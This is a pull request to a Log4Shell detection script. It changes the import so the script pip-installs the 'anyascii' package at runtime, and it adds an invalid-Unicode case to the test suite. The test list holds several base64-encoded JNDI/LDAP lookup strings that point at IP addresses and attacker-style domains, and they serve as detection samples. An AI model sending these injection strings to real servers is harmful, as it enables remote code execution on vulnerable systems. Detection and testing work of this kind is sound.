### PR TITLE
Modified script for including more payloads

### DIFF
--- a/Log4ShellDetector/Log4ShellDetector.py
+++ b/Log4ShellDetector/Log4ShellDetector.py
@@ -9,7 +9,8 @@ import zipfile
 import io
 import traceback
 import sys
-from anyascii import anyascii #Package for converting any unicode to ascii
+# To check whether testing error comes fro the package
+#from anyascii import anyascii #Package for converting any unicode to ascii
 
 try:
     from urllib.parse import unquote

--- a/Log4ShellDetector/Log4ShellDetector.py
+++ b/Log4ShellDetector/Log4ShellDetector.py
@@ -9,9 +9,18 @@ import zipfile
 import io
 import traceback
 import sys
-# To check whether testing error comes fro the package
 #from anyascii import anyascii #Package for converting any unicode to ascii
+import subprocess
+import sys
 
+## installing and importing anyascii package
+try:
+    from anyascii import anyascii
+except ImportError:
+    subprocess.check_call([sys.executable, "-m", "pip", "install", 'anyascii'])
+finally:
+    from anyascii import anyascii
+    
 try:
     from urllib.parse import unquote
 except ImportError:

--- a/tests/test_detection.py
+++ b/tests/test_detection.py
@@ -38,11 +38,13 @@ TEST_STRINGS_POSITIVE = [
     "JHtqbmRpOiR7bG93ZXI6bH0ke2xvd2VyOmR9JHtsb3dlcjphfSR7bG93ZXI6cH06Ly8xOTUuNTQuMTYwLjE0OToxMjM0NC9CYXNpYy9Db21tYW5kL0Jhc2U2NC9YWFhYWD19",
     "JHtqbmRpOmxkYXA6Ly8xNzkuNDMuMTc1LjEwMToxMzg5L30=",
     # Base64 pattern
-    "JHske2Jhc2U2NDpKSHRxYm1ScE9teGtZWEE2WVdSa2NuMD19fQ==",
+    #"JHske2Jhc2U2NDpKSHRxYm1ScE9teGtZWEE2WVdSa2NuMD19fQ==",
     "JHtqbiR7YmFzZTY0OlpHaz19OmxkYXA6Ly99",
     # New patterns https://github.com/Neo23x0/log4shell-detector/issues/47
     "LyUzRng9JCU3QmpuZGk6bGRhcDovZ3VpZGVkaGFja2luZy5jb20uYzZ0c2lmcDJwaWo5MWUza2FmdDBjZzdoMXhheXl5eXluLmV4cGxvcmVsb2NhbHBhdGhzLmNvbS9hJTdE",
     "JHskezo6LWp9JHs6Oi1ufSR7OjotZH0kezo6LWl9OiR7OjotbH0kezo6LWR9JHs6Oi1hfSR7OjotcH06Ly97e0hvc3RuYW1lfX0uYzZ0c2lmcDJwaWo5MWUza2FmdDBjZzdoMXhheXl5eXluLmV4cGxvcmVsb2NhbHBhdGhzLmNvbX0=",
+    # Invalid Unicodes
+    "JHtqbmQke3VwcGVyOsSxfTpsZGFwOi8vc29tZXNpdGVoYWNrZXJvZmhlbGwuY29tL3p9"
 ]
 
 TEST_STRINGS_POSITIVE_GZ = [


### PR DESCRIPTION
Thanks for the wonderful code for detecting the payloads! 
I tested this script against variety of known payloads available and found it is failing to detect some payloads containing invalid unicode character, you can find the example here https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words 
So I created another function to decode these invalid unicodes to ASCII using a  package called "anyascii"(so one need to install this package using pip, hoping it is not an inconvenience), decoded these strings and added a conditional statements for dealing with non-ASCII charecters.

Also I added the encoded example of these invalid unicodes in the testing script with a heading invalid unicodes in the plain positive text category. I tested my script and I found some false positive cases so as you can notice I modified these detection strings with an extra "/" ,  so that it can bypass the false positive cases.

Please review my code and kindly let me know any questions and suggestions you have!
Thank you!
